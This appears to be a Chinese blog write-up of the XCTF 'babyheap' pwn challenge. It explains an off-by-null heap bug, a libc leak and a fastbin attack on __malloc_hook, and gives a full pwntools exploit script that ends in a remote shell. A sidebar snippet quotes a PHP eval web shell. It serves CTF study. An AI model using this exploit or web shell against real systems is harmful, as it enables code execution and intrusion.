攻防世界 进阶 babyheap

最新推荐文章于 2022-09-18 10:09:14 发布
最新推荐文章于 2022-09-18 10:09:14 发布
阅读量435 收藏 1
点赞数 1
分类专栏: CTF 文章标签: offbynull libc泄露 fastbin_attack 堆内存管理 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113887714
版权

用到的漏洞是off by null

在这里插入图片描述保护绿油油。

在这里插入图片描述菜单,它这说的是2.27heap,但其实给的libc又是2.23的……

create
在这里插入图片描述最多6个chunk,然后 指针存在heap_list哪个数组里面。

read_input
在这里插入图片描述
这个里面可以看到,有个明显的off by null。

delete
在这里插入图片描述删的干干净净。

show
在这里插入图片描述平平无奇打印函数。

off by null的利用方式很多,但是总的来讲就是说先泄露libc的地址,然后再制造fastbin_attack。只是中间方法会有很多种,这取决于chunk的申请、释放、大小、多少,还取决于题目里面的一些条件。

这道题先说清楚题目给的各种条件。
首先是没有edit函数,只有在第一次申请的时候才能往里面写一些东西。一般遇到这种情况会稍微麻烦一点。

首先我们建立了五个chunk。
我们会在后面慢慢说为什么要建立这五个chunk,有没有一些其他思路,以及其他思路是否可行。

在这里插入图片描述

先说泄露libc的地址。
我们要做的是先通过D将E的pre_size修改成A B C D的大小总和,以及它的p位进行修改,然后释E,会将前面A B C D 合并,并且挂入unsorted bin链中。然后再考虑地址的释放。

但是在这一步的时候会有检查,首先检车A是否是空闲的,所以我们需要提前将A释放掉,还会检查E后面是否是used的,检查方法是检查E的下一个chunk F的下一个chunk G的p位,所以正常来讲,我们需要再E的下面申请一个F,来满足上面说的检查,但是我们程序只允许申请7个chunk,大家先记着,会在后面利用中申请chunk,所以这个申请chunk的名额不能随便给它,只能在E里面伪造F,那么怎么个伪造的方法,我们注意到off by one利用的时候会把pre_size最后一个字节变成’\x00’,所以我们申请到的春困如果是0x110的时候,利用漏洞结束的时候会变成0x100,那么我们就可以把E的最后0x10的空间伪造成一个单独的chunk。

然后继续说地址的泄露,我们之前释放了A,然后当我们申请A的时候unsorted的地址会被放到B里面,然后show会将地址输出。

然后开始第二大步,想办法对malloc_hook进行攻击。
我们需要先有fastbin范围的chunk挂在bin里面,所以会在freeD之前提前把C先free掉,让它挂到fastbin里面,然后我们现在通过申请一个比B大一些的chunk,让它能够在C里面写东西,我们就把C的fd的位置写上malloc的地址,然后两次申请发fastbin的chunk,来获得malloc_hook的chunk。

你会发现后来的时候又申请了一次0x118,两次0x68,其中一次0x68的地址会放到C的位置,那么剩下的两个加上前面的五个,一共七个,所以之前我们要在E里面去伪造chunk。

那么我们说能不能A B C D E少用一些chunk,比如不要Bchunk,直接复用A来往C中写东西,明显是不能的,因为再释放A之后并不会跟那个我们制造的overlap的chunk连在一起。

其他的一些也是因为一些其他原因,比如可能C Dchunk的size位大小发生变化等等,不能够利用成功。

#coding:utf8  
from pwn import *  
      
context.log_level = 'debug'  
p = remote('111.200.241.244',33587)  
libc_path = './64/libc-2.23.so'  
libc = ELF(libc_path)  

 
gadget = 0x4526a

elf = ELF('./babyheap')

malloc_hook_sym = libc.sym['__malloc_hook']
realloc_sym = libc.sym['realloc']
gadget = 0x4526a

def create(size, content):
    p.sendlineafter('Your choice :\n', '1')
    p.sendlineafter('Size:', str(size))
    p.sendafter('Data:', content)

def delete(index):
    p.sendlineafter('Your choice :\n', '2')
    p.sendlineafter('Index:', str(index))

def show():
    p.sendlineafter('Your choice :\n', '3')


create(0x100, 'a' * 0x100)
create(0x100, 'b' * 0x100)
create(0x68, 'c' * 0x68)
create(0x68, 'd' * 0x68)
create(0x100, 'e' * (0x100 - 16) + p64(0x100) + p64(0x11))

delete(2)
delete(3)
delete(0)

payload = 'e' * 0x60
payload += p64(0x300)
create(0x68, payload)

delete(4)
create(0x100, 'a' * 0x100)
show()
p.recvuntil('1 : ')
main_area_88 = u64(p.recvuntil(' ').ljust(8,'\x00'))
print hex(main_area_88)
malloc_hook = (main_area_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_sym & 0xFFF)
offset = malloc_hook - malloc_hook_sym
realloc_hook = offset + realloc_sym
gadget_addr = offset + gadget
system = offset + libc.sym['system']

payload = 'f' * 0x100
payload += p64(0) + p64(0x71)
payload += p64(malloc_hook - 0x23)
create(0x118, payload)

create(0x68, 'g' * 0x68)
payload = '\x00' * 0xB + p64(gadget_addr) + '\x00' * (0x13 - 0xB - 0x8)
payload += p64(realloc_hook + 2)
payload += '\n'
create(0x68, payload)

p.sendlineafter('Your choice :\n', '1')
p.sendlineafter('Size:', '$0')

p.interactive()
yongbaoii
关注
专栏目录
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 517
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
攻防世界进阶upload
舞动的獾
07-05 5374
攻防世界进阶upload 注册登陆后,发现上传页面 试着上传一个文件3.php: 内容如下: <?php eval(@$_POST['a']); ?> 我们试着将它改个名字抓包,并且改为jpg,措辞测试发现只有jog能够传上去 虽然上传成功,但是并不能显示出文件名的位置,蚁剑连接失败 看到回显名称有uid号,无奈的丝毫没有头绪 只好看了大佬的博客,竟然是注入,文件名称注入 当...
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2157
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
攻防世界babyheap
weixin_43960998的博客
04-05 221
off by null (libc2.23) 1.程序逆向 程序在 add 的 read 中存在一个 off by null,同时 add 时无 size 限制,可以直接申请进 unsorted bin 的 chunk,个数足够用。可以 show,free 正常 2.漏洞利用 和 secret of my heart 一样的利用手法,不再赘述。 记录一下调试 og 的过程。我们可以先尝试所有 og ,如果没有打通的情况下,利用 realloc 调节栈帧,这里可以断在最后触发时的 malloc 处,然后 s
攻防世界(pwn)babyheap(一些常见的堆利用方法)
PLpa的博客
03-22 2041
前言: 此题攻击链路:null_off_by_one修改堆块信息 => UAF泄露libc基址和其他有用信息 => fastbin attack申请堆块到指定地址 => 利用realloc_hook来调整堆栈 => one_gadget get shell。 64位程序,保护全开。 程序提供增删查操作,没有改操作。由于题目已经给了libc-2.23文件(虽然给错了)说明...
攻防世界-babyheap解题思路
aptx4869_li的博客
12-19 487
攻防世界-babyheap解题思路 文章目录攻防世界-babyheap解题思路保护机制分析漏洞分析攻击方式整理动态调试观察变化情况利用思路整理整理一下思路解题脚本执行效果 这是一个菜鸟误入大佬圈的开始,这个题初一看babyheap,以为是个简单题,结果是个坑,越陷越深 在此也感谢两位大佬,分享了解题思路,另外两位帮我补充了关键知识点: 关于解题思路:ha1vk,PLpa 关于知识点:如何判断One_gadget失效,关于__malloc_hook与__realloc_hook如何配合 也算是记录一
0ctf babyheap
qq_41071646的博客
05-13 480
这个题 一开始 不知道是怎么回事 然后这个程序开了 保护全开 基址随机化 这就要我们自己把libc的基址给泄露出来 泄露的方法我知道的是 把堆 free到 unsortbin的fd和bk指向自身main_arena 然后可以根据 main_arena 的偏移 搞出libc 库 道理都懂 但是怎么做 就不好说了 现在这里就有一道题 典型的菜单题 然后 看一下大概内容 有没...
无线网络安全攻防实战进阶
01-28
无线网络安全攻防实战进阶,无线网络安全攻防实战进阶,有问题加q1186351245
攻防世界进阶区—Cat
kuller_Yan的博客
04-06 1112
抓住那只猫!!!! 题目传送门,点击受害 这题讲道理唯一描述“抓住那只猫”我是完全没有看懂的,而且这题讲道理有一定难度 或不多说先进入题目网址: 将道理,看到表单避免不了的要输入试一试 先输入例子,loil.clud,没有反应 尝试127.0.0.1,出现变化! 欸嘿嘿,似乎有东西,那我们来尝试下系统命令执行规则来输入命令: command1 & command2 :先执行command...
dice_game攻防世界进阶
shanwei274的博客
04-10 1741
dice_game XCTF 4th-QCTF-2018 前言,不得不说,虽然是个简单题但是还是要记录一下,来让自己记住这些东西。 考察的知识点是: 1.cdll_loadlibrary加载对应库使得Python可以使用c的函数。 2.关于srand函数中种子的介绍。 3.一些平时没有见过的杂项 保证我写的很详细,因为我也是个菜鸡 ----第一步查看保护喽 第一眼就很恐怖嗷,居然就只有canary没有开,其他的全开,got表也不能修改,我就很痛苦嗷 ----第二步ida看看 main函数这里要说的呢 1
babyheap(uaf ,绕过tcache doublefree检测)
最新发布
m0_51251108的博客
09-18 1073
浙江省第五届大学生网络与信息安全竞赛预赛pwn
ctf攻防世界
weixin_64286326的博客
12-05 4195
1:如来十三掌 下载完附件顺利打开,如图所示: 第一个感觉就像是佛曰加密,这题第一个坑就是没有加 “佛曰”二字。翻译如下: 这个乱码看着像是Base但试了试不对,想到题目的十三数字目光锁到rot13加密,顺利解密 解密出来是base64最后得出 flag{bdscjhbkzmnfrdhbvckijndskvbkjdsab} 佛曰解密:与佛论禅 rot13解密:ROT5、ROT13、ROT18、ROT47位移编码 2: ...
【BUUCTF - PWN】babyheap_0ctf_2017
古月浪子的博客
04-05 2640
checksec一下,堆题果然是保护全开 IDA打开看看,首先mmap一块随机区域,用于存放我们申请的块的属性,然后输出菜单,有allocate、fill、free、dump功能 可以注意到,在创建堆的时候,将堆的地址和大小存放在了mmap的区域中,并且使用的是calloc,会将申请的内存区域清零 漏洞点在fill函数中,没有限制输入内容的长度,从而可以堆溢出 删除堆后会将指针置零 输出...
babyheap_0ctf_2017
m0sway的博客
11-25 564
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
2017 0ctf babyheap
wuyvle的博客
07-26 1082
之前学习了一下lager bins的构建,今天来学习一下堆重叠和堆扩展 先找漏洞点 这里没有对大小进行检查,可以输入任意字节,存在字节溢出 此题的难点在于如何泄露libc,由于add使用calloc的原因,当堆块从bins中拿出来时,会清空堆块 很明显我们要申请大的堆块进入unsorted bins来使main_aren+88写在堆块上,我们可以使上一个堆块扩展到这个堆块上来进行泄露 先贴上exp from pwn import * context.log_level = 'debug' context.u
XCTF 4th-QCTF-2018 babyheap
qq_41071646的博客
07-28 1842
这几天做pwn题做的很恶心了,,等下个星期想去继续肝内核pwn。。 先看一下这个题目的保护 基本该有的保护都有了 然后先看一下这个题 ida里面分析 发现了 程序没有给我们堆块修改的功能 这里可以通过 堆块合并 /重叠 然后申请达到修改堆块还有泄露堆块的目的 这里我们发现了 off by null 然后这里的思路 exp 来源于 https://www.xct...
网鼎杯 babyheap
MozhuCY的博客
09-21 895
网鼎杯第一场 程序功能:新建,编辑,打印,free free处没有置空指针,导致可以uaf malloc每次都是0x20的fastbin,编辑功能可以使用3次 自写了readn函数,没有溢出点 edit可以修改free后堆块的bk,fd 1 2 3 4 5 Arch: amd64-64-little RELRO: Full RELRO S...
星盟-pwn-babyheap
qq_65147345的博客
08-01 223
1. 堆重叠获取libc_base地址 2. 使用unsorted attack更改global_max_fast,使chunk进入fastbin 3. 使用fastbin attack更改malloc_hook为one_gadget
攻防世界序列化漏洞详解与利用
"攻防世界序列化问题详解" 在网络安全领域,尤其是CTF(Capture The Flag)挑战中,序列化和反序列化是常见的漏洞利用点。本篇内容主要聚焦于攻防世界平台中涉及的序列化问题,通过一道具体的题目来深入解析这一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值